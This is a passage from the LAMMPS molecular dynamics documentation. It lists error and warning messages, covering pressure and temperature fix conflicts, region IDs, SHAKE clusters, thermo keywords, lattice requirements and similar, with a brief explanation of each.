<DD>Self-explanatory.
<DT><I>Potential file has duplicate entry</I>
<DD>The potential file for a SW or Tersoff potential has more than
one entry for the same 3 ordered elements.
<DT><I>Potential file is missing an entry</I>
<DD>The potential file for a SW or Tersoff potential does not have a
needed entry.
<DT><I>Power by 0 in variable formula</I>
<DD>Self-explanatory.
<DT><I>Pressure ID for fix box/relax does not exist</I>
<DD>The compute ID needed to compute pressure for the fix does not
exist.
<DT><I>Pressure ID for fix modify does not exist</I>
<DD>Self-explanatory.
<DT><I>Pressure ID for fix npt/nph does not exist</I>
<DD>Self-explanatory.
<DT><I>Pressure ID for fix press/berendsen does not exist</I>
<DD>The compute ID needed to compute pressure for the fix does not
exist.
<DT><I>Pressure ID for thermo does not exist</I>
<DD>The compute ID needed to compute pressure for thermodynamics does not
exist.
<DT><I>Pressure control can not be used with fix nvt/asphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control can not be used with fix nvt/sllod</I>
<DD>Self-explanatory.
<DT><I>Pressure control can not be used with fix nvt/sphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control can not be used with fix nvt</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix nph/asphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix nph/sphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix nph</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix npt/asphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix npt/sphere</I>
<DD>Self-explanatory.
<DT><I>Pressure control must be used with fix npt</I>
<DD>Self-explanatory.
<DT><I>Processor count in z must be 1 for 2d simulation</I>
<DD>Self-explanatory.
<DT><I>Processor partitions are inconsistent</I>
<DD>The total number of processors in all partitions must match the number
of processors LAMMPS is running on.
<DT><I>Processors command after simulation box is defined</I>
<DD>The processors command cannot be used after a read_data, read_restart,
or create_box command.
<DT><I>Quaternion creation numeric error</I>
<DD>A numeric error occurred in the creation of a rigid body by the fix
rigid command.
<DT><I>R0 < 0 for fix spring command</I>
<DD>Equilibrium spring length is invalid.
<DT><I>Reax_defs.h setting for NATDEF is too small</I>
<DD>Edit the setting in the ReaxFF library and re-compile the
library and re-build LAMMPS.
<DT><I>Reax_defs.h setting for NNEIGHMAXDEF is too small</I>
<DD>Edit the setting in the ReaxFF library and re-compile the
library and re-build LAMMPS.
<DT><I>Region ID for compute reduce/region does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for compute temp reduce/region does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for compute temp/region does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for dump cfg does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for dump custom does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix addforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix aveforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix deposit does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix evaporate does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix heat does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix setforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Region ID for fix wall/region does not exist</I>
<DD>Self-explanatory.
<DT><I>Region cannot have 0 length rotation vector</I>
<DD>Self-explanatory.
<DT><I>Region intersect region ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Region union or intersect cannot be dynamic</I>
<DD>The sub-regions can be dynamic, but not the combined region.
<DT><I>Region union region ID does not exist</I>
<DD>One or more of the region IDs specified by the region union command
does not exist.
<DT><I>Replacing a fix, but new style != old style</I>
<DD>A fix ID can be used a 2nd time, but only if the style matches the
previous fix. In this case it is assumed you with to reset a fix's
parameters. This error may mean you are mistakenly re-using a fix ID
when you do not intend to.
<DT><I>Replicate command before simulation box is defined</I>
<DD>The replicate command cannot be used before a read_data, read_restart,
or create_box command.
<DT><I>Replicate did not assign all atoms correctly</I>
<DD>Atoms replicated by the replicate command were not assigned correctly
to processors. This is likely due to some atom coordinates being
outside a non-periodic simulation box.
<DT><I>Respa inner cutoffs are invalid</I>
<DD>The first cutoff must be <= the second cutoff.
<DT><I>Respa levels must be >= 1</I>
<DD>Self-explanatory.
<DT><I>Respa middle cutoffs are invalid</I>
<DD>The first cutoff must be <= the second cutoff.
<DT><I>Reuse of compute ID</I>
<DD>A compute ID cannot be used twice.
<DT><I>Reuse of dump ID</I>
<DD>A dump ID cannot be used twice.
<DT><I>Reuse of region ID</I>
<DD>A region ID cannot be used twice.
<DT><I>Rigid body has degenerate moment of inertia</I>
<DD>Fix poems will only work with bodies (collections of atoms) that have
non-zero principal moments of inertia. This means they must be 3 or
more non-collinear atoms, even with joint atoms removed.
<DT><I>Rigid fix must come before NPT/NPH fix</I>
<DD>NPT/NPH fix must be defined in input script after all rigid fixes,
else the rigid fix contribution to the pressure virial is
incorrect.
<DT><I>Run command before simulation box is defined</I>
<DD>The run command cannot be used before a read_data, read_restart, or
create_box command.
<DT><I>Run command start value is after start of run</I>
<DD>Self-explanatory.
<DT><I>Run command stop value is before end of run</I>
<DD>Self-explanatory.
<DT><I>Run command upto value is before current timestep</I>
<DD>Self-explanatory.
<DT><I>Run_style command before simulation box is defined</I>
<DD>The run_style command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>SRD bin size for fix srd differs from user request</I>
<DD>Fix SRD had to adjust the bin size to fit the simulation box.
<DT><I>SRD bins for fix srd are not cubic enough</I>
<DD>The bin shape is not within tolerance of cubic.
<DT><I>SRD particle %d started inside big particle %d on step %d bounce %d</I>
<DD>This may not be a problem, but indicates one or more SRD particles are
being left inside solute particles.
<DT><I>Set command before simulation box is defined</I>
<DD>The set command cannot be used before a read_data, read_restart,
or create_box command.
<DT><I>Set command with no atoms existing</I>
<DD>No atoms are yet defined so the set command cannot be used.
<DT><I>Set region ID does not exist</I>
<DD>Region ID specified in set command does not exist.
<DT><I>Shake angles have different bond types</I>
<DD>All 3-atom angle-constrained SHAKE clusters specified by the fix shake
command that are the same angle type, must also have the same bond
types for the 2 bonds in the angle.
<DT><I>Shake atoms %d %d %d %d missing on proc %d at step %d</I>
<DD>The 4 atoms in a single shake cluster specified by the fix shake
command are not all accessible to a processor. This probably means
an atom has moved too far.
<DT><I>Shake atoms %d %d %d missing on proc %d at step %d</I>
<DD>The 3 atoms in a single shake cluster specified by the fix shake
command are not all accessible to a processor. This probably means
an atom has moved too far.
<DT><I>Shake atoms %d %d missing on proc %d at step %d</I>
<DD>The 2 atoms in a single shake cluster specified by the fix shake
command are not all accessible to a processor. This probably means
an atom has moved too far.
<DT><I>Shake cluster of more than 4 atoms</I>
<DD>A single cluster specified by the fix shake command can have no more
than 4 atoms.
<DT><I>Shake clusters are connected</I>
<DD>A single cluster specified by the fix shake command must have a single
central atom with up to 3 other atoms bonded to it.
<DT><I>Shake determinant = 0.0</I>
<DD>The determinant of the matrix being solved for a single cluster
specified by the fix shake command is numerically invalid.
<DT><I>Shake fix must come before NPT/NPH fix</I>
<DD>NPT fix must be defined in input script after SHAKE fix, else the
SHAKE fix contribution to the pressure virial is incorrect.
<DT><I>Shape command before simulation box is defined</I>
<DD>Self-explanatory.
<DT><I>Sqrt of negative value in variable formula</I>
<DD>Self-explanatory.
<DT><I>Substitution for illegal variable</I>
<DD>Input script line contained a variable that could not be substituted
for.
<DT><I>TIP4P hydrogen has incorrect atom type</I>
<DD>The TIP4P pairwise computation found an H atom whose type does not
agree with the specified H type.
<DT><I>TIP4P hydrogen is missing</I>
<DD>The TIP4P pairwise computation failed to find the correct H atom
within a water molecule.
<DT><I>TMD target file did not list all group atoms</I>
<DD>The target file for the fix tmd command did not list all atoms in the
fix group.
<DT><I>Target temperature for fix nvt/npt/nph cannot be 0.0</I>
<DD>Self-explanatory.
<DT><I>Target temperature for fix rigid/nvt cannot be 0.0</I>
<DD>Self-explanatory.
<DT><I>Temper command before simulation box is defined</I>
<DD>The temper command cannot be used before a read_data, read_restart, or
create_box command.
<DT><I>Temperature ID for fix bond/swap does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature ID for fix box/relax does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature ID for fix nvt/nph/npt does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature ID for fix press/berendsen does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature ID for fix temp/berendsen does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature ID for fix temp/rescale does not exist</I>
<DD>Self-explanatory.
<DT><I>Temperature control can not be used with fix nph/asphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control can not be used with fix nph/sphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control can not be used with fix nph</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix npt/asphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix npt/sphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix npt</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix nvt/asphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix nvt/sllod</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix nvt/sphere</I>
<DD>Self-explanatory.
<DT><I>Temperature control must be used with fix nvt</I>
<DD>Self-explanatory.
<DT><I>Temperature for fix nvt/sllod does not have a bias</I>
<DD>The specified compute must compute temperature with a bias.
<DT><I>Tempering could not find thermo_pe compute</I>
<DD>This compute is created by the thermo command. It must have been
explicitly deleted by a uncompute command.
<DT><I>Tempering fix ID is not defined</I>
<DD>The fix ID specified by the temper command does not exist.
<DT><I>Tempering temperature fix is not valid</I>
<DD>The fix specified by the temper command is not one that controls
temperature (nvt or langevin).
<DT><I>Thermo and fix not computed at compatible times</I>
<DD>Fixes generate values on specific timesteps. The thermo output
does not match these timesteps.
<DT><I>Thermo compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Thermo compute does not compute array</I>
<DD>Self-explanatory.
<DT><I>Thermo compute does not compute scalar</I>
<DD>Self-explanatory.
<DT><I>Thermo compute does not compute vector</I>
<DD>Self-explanatory.
<DT><I>Thermo compute vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Thermo custom variable cannot be indexed</I>
<DD>Self-explanatory.
<DT><I>Thermo custom variable is not equal-style variable</I>
<DD>Only equal-style variables can be output with thermodynamics, not
atom-style variables.
<DT><I>Thermo every variable returned a bad timestep</I>
<DD>The variable must return a timestep greater than the current timestep.
<DT><I>Thermo fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Thermo fix does not compute array</I>
<DD>Self-explanatory.
<DT><I>Thermo fix does not compute scalar</I>
<DD>Self-explanatory.
<DT><I>Thermo fix does not compute vector</I>
<DD>Self-explanatory.
<DT><I>Thermo fix vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Thermo keyword in variable requires lattice be defined</I>
<DD>The xlat, ylat, zlat keywords refer to lattice properties.
<DT><I>Thermo keyword in variable requires thermo to use/init pe</I>
<DD>You are using a thermo keyword in a variable that requires
potential energy to be calculated, but your thermo output
does not use it. Add it to your thermo output.
<DT><I>Thermo keyword in variable requires thermo to use/init press</I>
<DD>You are using a thermo keyword in a variable that requires pressure to
be calculated, but your thermo output does not use it. Add it to your
thermo output.
<DT><I>Thermo keyword in variable requires thermo to use/init temp</I>
<DD>You are using a thermo keyword in a variable that requires temperature
to be calculated, but your thermo output does not use it. Add it to
your thermo output.
<DT><I>Thermo keyword requires lattice be defined</I>
<DD>The xlat, ylat, zlat keywords refer to lattice properties.
<DT><I>Thermo style does not use press</I>
<DD>Cannot use thermo_modify to set this parameter since the thermo_style
is not computing this quantity.
<DT><I>Thermo style does not use temp</I>
<DD>Cannot use thermo_modify to set this parameter since the thermo_style
is not computing this quantity.
<DT><I>Thermo_modify pressure ID does not compute pressure</I>
<DD>The specified compute ID does not compute pressure.
<DT><I>Thermo_modify temperature ID does not compute temperature</I>
<DD>The specified compute ID does not compute temperature.
<DT><I>Thermo_style command before simulation box is defined</I>
<DD>The thermo_style command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>This variable thermo keyword cannot be used between runs</I>
<DD>Keywords that refer to time (such as cpu, elapsed) do not
make sense in between runs.
<DT><I>Threshhold for an atom property that isn't allocated</I>
<DD>A dump threshhold has been requested on a quantity that is
not defined by the atom style used in this simulation.
<DT><I>Timestep must be >= 0</I>
<DD>Specified timestep size is invalid.
<DT><I>Too big a problem to replicate with molecular atom style</I>
<DD>Molecular problems cannot become bigger than 2^31 atoms (or bonds,
etc) when replicated, else the atom IDs and other quantities cannot be
stored in 32-bit quantities.
<DT><I>Too few bits for lookup table</I>
<DD>Table size specified via pair_modify command does not work with your
machine's floating point representation.
<DT><I>Too many atom sorting bins</I>
<DD>This is likely due to an immense simulation box that has blown up
to a large size.
<DT><I>Too many atoms to dump sort</I>
<DD>Cannot sort when running with more than 2^31 atoms.
<DT><I>Too many exponent bits for lookup table</I>
<DD>Table size specified via pair_modify command does not work with your
machine's floating point representation.
<DT><I>Too many groups</I>
<DD>The maximum number of atom groups (including the "all" group) is
given by MAX_GROUP in group.cpp and is 32.
<DT><I>Too many mantissa bits for lookup table</I>
<DD>Table size specified via pair_modify command does not work with your
machine's floating point representation.
<DT><I>Too many masses for fix shake</I>
<DD>The fix shake command cannot list more masses than there are atom
types.
<DT><I>Too many neighbor bins</I>
<DD>This is likely due to an immense simulation box that has blown up
to a large size.
<DT><I>Too many total bits for bitmapped lookup table</I>
<DD>Table size specified via pair_modify command is too large. Note that
a value of N generates a 2^N size table.
<DT><I>Too many touching neighbors - boost MAXTOUCH</I>
<DD>A granular simulation has too many neighbors touching one atom. The
MAXTOUCH parameter in fix_shear_history.cpp must be set larger and
LAMMPS must be re-built.
<DT><I>Tree structure in joint connections</I>
<DD>Fix poems cannot (yet) work with coupled bodies whose joints connect
the bodies in a tree structure.
<DT><I>Triclinic box must be periodic in skewed dimensions</I>
<DD>This is a requirement for using a non-orthogonal box. E.g. to set a
non-zero xy tilt, both x and y must be periodic dimensions.
<DT><I>Triclinic box skew is too large</I>
<DD>The displacement in a skewed direction must be less than half the box
length in that dimension. E.g. the xy tilt must be between -half and
+half of the x box length.
<DT><I>Tried to convert a double to int, but input_double > INT_MAX</I>
<DD>Self-explanatory.
<DT><I>Two groups cannot be the same in fix spring couple</I>
<DD>Self-explanatory.
<DT><I>Unbalanced quotes in input line</I>
<DD>No matching end double quote was found following a leading double
quote.
<DT><I>Unexpected end of data file</I>
<DD>LAMMPS hit the end of the data file while attempting to read a
section. Something is wrong with the format of the data file.
<DT><I>Units command after simulation box is defined</I>
<DD>The units command cannot be used after a read_data, read_restart, or
create_box command.
<DT><I>Universe/uloop variable count < # of partitions</I>
<DD>A universe or uloop style variable must specify a number of values >= to the
number of processor partitions.
<DT><I>Unknown command: %s</I>
<DD>The command is not known to LAMMPS. Check the input script.
<DT><I>Unknown identifier in data file: %s</I>
<DD>A section of the data file cannot be read by LAMMPS.
<DT><I>Unknown table style in angle style table</I>
<DD>Self-explanatory.
<DT><I>Unknown table style in bond style table</I>
<DD>Self-explanatory.
<DT><I>Unknown table style in pair_style command</I>
<DD>Style of table is invalid for use with pair_style table command.
<DT><I>Unrecognized lattice type in MEAM file 1</I>
<DD>The lattice type in an entry of the MEAM library file is not
valid.
<DT><I>Unrecognized lattice type in MEAM file 2</I>
<DD>The lattice type in an entry of the MEAM parameter file is not
valid.
<DT><I>Use of compute temp/ramp with undefined lattice</I>
<DD>Must use lattice command with compute temp/ramp command if units
option is set to lattice.
<DT><I>Use of displace_atoms with undefined lattice</I>
<DD>Must use lattice command with displace_atoms command if units option
is set to lattice.
<DT><I>Use of displace_box with undefined lattice</I>
<DD>Must use lattice command with displace_box command if units option is
set to lattice.
<DT><I>Use of fix ave/spatial with undefined lattice</I>
<DD>A lattice must be defined to use fix ave/spatial with units = lattice.
<DT><I>Use of fix deform with undefined lattice</I>
<DD>A lattice must be defined to use fix deform with units = lattice.
<DT><I>Use of fix deposit with undefined lattice</I>
<DD>Must use lattice command with compute fix deposit command if units
option is set to lattice.
<DT><I>Use of fix dt/reset with undefined lattice</I>
<DD>Must use lattice command with fix dt/reset command if units option is
set to lattice.
<DT><I>Use of fix indent with undefined lattice</I>
<DD>The lattice command must be used to define a lattice before using the
fix indent command.
<DT><I>Use of fix move with undefined lattice</I>
<DD>Must use lattice command with fix move command if units option is
set to lattice.
<DT><I>Use of fix recenter with undefined lattice</I>
<DD>Must use lattice command with fix recenter command if units option is
set to lattice.
<DT><I>Use of fix wall with undefined lattice</I>
<DD>Must use lattice command with fix wall command if units option is set
to lattice.
<DT><I>Use of fix wall/reflect with undefined lattice</I>
<DD>If scale = lattice (the default) for the fix wall/reflect command,
then a lattice must first be defined via the lattice command.
<DT><I>Use of region with undefined lattice</I>
<DD>If scale = lattice (the default) for the region command, then a
lattice must first be defined via the lattice command.
<DT><I>Use of velocity with undefined lattice</I>
<DD>If scale = lattice (the default) for the velocity set or velocity ramp
command, then a lattice must first be defined via the lattice command.
<DT><I>Using fix nvt/sllod with inconsistent fix deform remap option</I>
<DD>Fix nvt/sllod requires that deforming atoms have a velocity profile
provided by "remap v" as a fix deform option.
<DT><I>Using fix nvt/sllod with no fix deform defined</I>
<DD>Self-explanatory.
<DT><I>Using fix srd with inconsistent fix deform remap option</I>
<DD>When shearing the box in an SRD simulation, the remap v option for fix
deform needs to be used.
<DT><I>Variable evaluation before simulation box is defined</I>
<DD>Cannot evaluate a compute or fix or atom-based value in a variable
before the simulation has been setup.
<DT><I>Variable for dump every is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix adapt is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix aveforce is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix efield is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix indent is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix indent is not equal style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix move is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix setforce is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for fix wall/reflect is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable for thermo every is invalid style</I>
<DD>Only equal-style variables can be used.
<DT><I>Variable formula compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Variable formula compute vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Variable formula fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Variable formula fix vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Variable name for compute reduce does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for dump every does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix adapt does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix addforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix ave/atom does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix ave/correlate does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix ave/histo does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix ave/spatial does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix ave/time does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix aveforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix efield does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix indent does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix move does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix setforce does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix store/state does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for fix wall/relect does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name for thermo every does not exist</I>
<DD>Self-explanatory.
<DT><I>Variable name must be alphanumeric or underscore characters</I>
<DD>Self-explanatory.
<DT><I>Velocity command before simulation box is defined</I>
<DD>The velocity command cannot be used before a read_data, read_restart,
or create_box command.
<DT><I>Velocity command with no atoms existing</I>
<DD>A velocity command has been used, but no atoms yet exist.
<DT><I>Velocity ramp in z for a 2d problem</I>
<DD>Self-explanatory.
<DT><I>Velocity temperature ID does not compute temperature</I>
<DD>The compute ID given to the velocity command must compute
temperature.
<DT><I>Virial was not tallied on needed timestep</I>
<DD>You are using a thermo keyword that requires potentials to
have tallied the virial, but they didn't on this timestep. See the
variable doc page for ideas on how to make this work.
<DT><I>World variable count doesn't match # of partitions</I>
<DD>A world-style variable must specify a number of values equal to the
number of processor partitions.
<DT><I>Write_restart command before simulation box is defined</I>
<DD>The write_restart command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Zero-length lattice orient vector</I>
<DD>Self-explanatory.
</DL>
<H4><A NAME = "warn"></A>Warnings:
</H4>
<DL>
<DT><I>All element names have been set to 'C' for dump cfg</I>
<DD>Use the dump_modify command if you wish to override this.
<DT><I>Atom with molecule ID = 0 included in compute molecule group</I>
<DD>The group used in a compute command that operates on moleclues
includes atoms with no molecule ID. This is probably not what you
want.
<DT><I>Broken bonds will not alter angles, dihedrals, or impropers</I>
<DD>See the doc page for fix bond/break for more info on this
restriction.
<DT><I>Compute cna/atom cutoff may be too large to find ghost atom neighbors</I>
<DD>The neighbor cutoff used may not encompass enough ghost atoms
to perform this operation correctly.
<DT><I>Computing temperature of portions of rigid bodies</I>
<DD>The group defined by the temperature compute does not encompass all
the atoms in one or more rigid bodies, so the change in
degrees-of-freedom for the atoms in those partial rigid bodies will
not be accounted for.
<DT><I>Created bonds will not create angles, dihedrals, or impropers</I>
<DD>See the doc page for fix bond/create for more info on this
restriction.
<DT><I>Dihedral problem: %d %d %d %d %d %d</I>
<DD>Conformation of the 4 listed dihedral atoms is extreme; you may want
to check your simulation geometry.
<DT><I>Dump dcd/xtc timestamp may be wrong with fix dt/reset</I>
<DD>If the fix changes the timestep, the dump dcd file will not
reflect the change.
<DT><I>FENE bond too long: %d %d %d %g</I>
<DD>A FENE bond has stretched dangerously far. It's interaction strength
will be truncated to attempt to prevent the bond from blowing up.
<DT><I>FENE bond too long: %d %g</I>
<DD>A FENE bond has stretched dangerously far. It's interaction strength
will be truncated to attempt to prevent the bond from blowing up.
<DT><I>Fix bond/swap will ignore defined angles</I>
<DD>See the doc page for fix bond/swap for more info on this
restriction.
<DT><I>Fix move does not update angular momentum</I>
<DD>Atoms store this quantity, but fix move does not (yet) update it.
<DT><I>Fix move does not update quaternions</I>
<DD>Atoms store this quantity, but fix move does not (yet) update it.
<DT><I>Fix recenter should come after all other integration fixes</I>
<DD>Other fixes may change the position of the center-of-mass, so
fix recenter should come last.
<DT><I>Fix srd SRD moves may trigger frequent reneighboring</I>
<DD>This is because the SRD particles may move long distances.
<DT><I>Fix srd grid size > 1/4 of big particle diameter</I>
<DD>This may cause accuracy problems.
<DT><I>Fix srd particle moved outside valid domain</I>
<DD>This may indicate a problem with your simulation parameters.
<DT><I>Fix srd particles may move > big particle diameter</I>
<DD>This may cause accuracy problems.
<DT><I>Fix srd viscosity < 0.0 due to low SRD density</I>
<DD>This may cause accuracy problems.
<DT><I>Fix thermal/conductivity comes before fix ave/spatial</I>
<DD>The order of these 2 fixes in your input script is such that fix
thermal/conductivity comes first. If you are using fix ave/spatial to
measure the temperature profile induced by fix viscosity, then this
may cause a glitch in the profile since you are averaging immediately
after swaps have occurred. Flipping the order of the 2 fixes
typically helps.
<DT><I>Fix viscosity comes before fix ave/spatial</I>
<DD>The order of these 2 fixes in your input script is such that
fix viscosity comes first. If you are using fix ave/spatial
to measure the velocity profile induced by fix viscosity, then
this may cause a glitch in the profile since you are averaging
immediately after swaps have occurred. Flipping the order
of the 2 fixes typically helps.
<DT><I>Group for fix_modify temp != fix group</I>
<DD>The fix_modify command is specifying a temperature computation that
computes a temperature on a different group of atoms than the fix
itself operates on. This is probably not what you want to do.
<DT><I>Improper problem: %d %d %d %d %d %d</I>
<DD>Conformation of the 4 listed improper atoms is extreme; you may want
to check your simulation geometry.
<DT><I>Kspace_modify slab param < 2.0 may cause unphysical behavior</I>
<DD>The kspace_modify slab parameter should be larger to insure periodic
grids padded with empty space do not overlap.
<DT><I>Less insertions than requested</I>
<DD>Less atom insertions occurred on this timestep due to the fix pour
command than were scheduled. This is probably because there were too
many overlaps detected.
<DT><I>Lost atoms: original %.15g current %.15g</I>
<DD>A thermodynamic computation has detected lost atoms.
<DT><I>Mismatch between velocity and compute groups</I>
<DD>The temperature computation used by the velocity command will not be
on the same group of atoms that velocities are being set for.
<DT><I>More than one compute centro/atom</I>
<DD>It is not efficient to use compute centro/atom more than once.
<DT><I>More than one compute cna/atom defined</I>
<DD>It is not efficient to use compute cna/atom more than once.
<DT><I>More than one compute coord/atom</I>
<DD>It is not efficient to use compute coord/atom more than once.
<DT><I>More than one compute damage/atom</I>
<DD>It is not efficient to use compute ke/atom more than once.
<DT><I>More than one compute ke/atom</I>
<DD>It is not efficient to use compute ke/atom more than once.
<DT><I>More than one fix poems</I>
<DD>It is not efficient to use fix poems more than once.
<DT><I>More than one fix rigid</I>
<DD>It is not efficient to use fix rigid more than once.
<DT><I>New thermo_style command, previous thermo_modify settings will be lost</I>
<DD>If a thermo_style command is used after a thermo_modify command, the
settings changed by the thermo_modify command will be reset to their
default values. This is because the thermo_modify commmand acts on
the currently defined thermo style, and a thermo_style command creates
a new style.
<DT><I>No fixes defined, atoms won't move</I>
<DD>If you are not using a fix like nve, nvt, npt then atom velocities and
coordinates will not be updated during timestepping.
<DT><I>No joints between rigid bodies, use fix rigid instead</I>
<DD>The bodies defined by fix poems are not connected by joints. POEMS
will integrate the body motion, but it would be more efficient to use
fix rigid.
<DT><I>Not using real units with pair reax</I>
<DD>This is most likely an error, unless you have created your own ReaxFF
parameter file in a different set of units.
<DT><I>One or more atoms are time integrated more than once</I>
<DD>This is probably an error since you typically do not want to
advance the positions or velocities of an atom more than once
per timestep.
<DT><I>One or more compute molecules has atoms not in group</I>
<DD>The group used in a compute command that operates on moleclues does
not include all the atoms in some molecules. This is probably not
what you want.
<DT><I>One or more respa levels compute no forces</I>
<DD>This is computationally inefficient.
<DT><I>Pair COMB charge %.10f with force %.10f hit max barrier</I>
<DD>Something is possibly wrong with your model.
<DT><I>Pair COMB charge %.10f with force %.10f hit min barrier</I>
<DD>Something is possibly wrong with your model.
<DT><I>Pair dsmc: num_of_collisions > number_of_A</I>
<DD>Collision model in DSMC is breaking down.
<DT><I>Pair dsmc: num_of_collisions > number_of_B</I>
<DD>Collision model in DSMC is breaking down.
<DT><I>Particle deposition was unsuccessful</I>
<DD>The fix deposit command was not able to insert as many atoms as
needed. The requested volume fraction may be too high, or other atoms
may be in the insertion region.
<DT><I>Reducing PPPM order b/c stencil extends beyond neighbor processor</I>
<DD>LAMMPS is attempting this in order to allow the simulation
to run. It should not effect the PPPM accuracy.
<DT><I>Replacing a fix, but new group != old group</I>
<DD>The ID and style of a fix match for a fix you are changing with a fix
command, but the new group you are specifying does not match the old
group.
<DT><I>Replicating in a non-periodic dimension</I>
<DD>The parameters for a replicate command will cause a non-periodic
dimension to be replicated; this may cause unwanted behavior.
<DT><I>Resetting reneighboring criteria during PRD</I>
<DD>A PRD simulation requires that neigh_modify settings be delay = 0,
every = 1, check = yes. Since these settings were not in place,
LAMMPS changed them and will restore them to their original values
after the PRD simulation.
<DT><I>Resetting reneighboring criteria during minimization</I>
<DD>Minimization requires that neigh_modify settings be delay = 0, every =
1, check = yes. Since these settings were not in place, LAMMPS
changed them and will restore them to their original values after the
minimization.
<DT><I>Restart file used different # of processors</I>
<DD>The restart file was written out by a LAMMPS simulation running on a
different number of processors. Due to round-off, the trajectories of
your restarted simulation may diverge a little more quickly than if
you ran on the same # of processors.
<DT><I>Restart file used different 3d processor grid</I>
<DD>The restart file was written out by a LAMMPS simulation running on a
different 3d grid of processors. Due to round-off, the trajectories
of your restarted simulation may diverge a little more quickly than if
you ran on the same # of processors.
<DT><I>Restart file used different boundary settings, using restart file values</I>
<DD>Your input script cannot change these restart file settings.
<DT><I>Restart file used different newton bond setting, using restart file value</I>
<DD>The restart file value will override the setting in the input script.
<DT><I>Restart file used different newton pair setting, using input script value</I>
<DD>The input script value will override the setting in the restart file.
<DT><I>Restart file version does not match LAMMPS version</I>
<DD>This may cause problems when reading the restart file.
<DT><I>Running PRD with only one replica</I>
<DD>This is allowed, but you will get no parallel speed-up.
<DT><I>SRD bin shifting turned on due to small lamda</I>
<DD>This is done to try to preserve accuracy.
<DT><I>SRD bin size for fix srd differs from user request</I>
<DD>Check if the new bin size is acceptable.
<DT><I>SRD bins for fix srd are not cubic enough</I>
<DD>Check if the bin shape is acceptable.
<DT><I>SRD particle %d started inside big particle %d on step %d bounce %d</I>
<DD>This may not be a problem, but indicates one or more SRD particles are
being left inside solute particles.
<DT><I>Shake determinant < 0.0</I>
<DD>The determinant of the quadratic equation being solved for a single
cluster specified by the fix shake command is numerically suspect. LAMMPS
will set it to 0.0 and continue.
<DT><I>Should not allow rigid bodies to bounce off relecting walls</I>
<DD>LAMMPS allows this, but their dynamics are not computed correctly.
<DT><I>System is not charge neutral, net charge = %g</I>
<DD>The total charge on all atoms on the system is not 0.0, which
is not valid for Ewald or PPPM.
<DT><I>Table inner cutoff >= outer cutoff</I>
<DD>You specified an inner cutoff for a Coulombic table that is longer
than the global cutoff. Probably not what you wanted.
<DT><I>Temperature for MSST is not for group all</I>
<DD>User-assigned temperature to MSST fix does not compute temperature for
all atoms. Since MSST computes a global pressure, the kinetic energy
contribution from the temperature is assumed to also be for all atoms.
